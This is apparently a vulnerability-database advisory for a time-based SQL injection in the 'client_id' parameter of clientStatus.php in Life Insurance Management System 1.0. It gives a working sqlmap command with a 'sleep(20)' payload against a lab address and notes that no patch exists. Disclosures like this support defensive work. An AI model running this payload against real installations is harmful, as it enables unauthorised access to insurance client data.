vendor:
Life Insurance Management System
by:
Aitor Herrero
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Life Insurance Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:life_insurance_management_system
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Windows, Linux
2021
Life Insurance Management System 1.0 – ‘client_id’ SQL Injection
Login in the application and go to clientStatus.php?client_id= and use sqlmap -u http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1 to exploit the vulnerability.
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.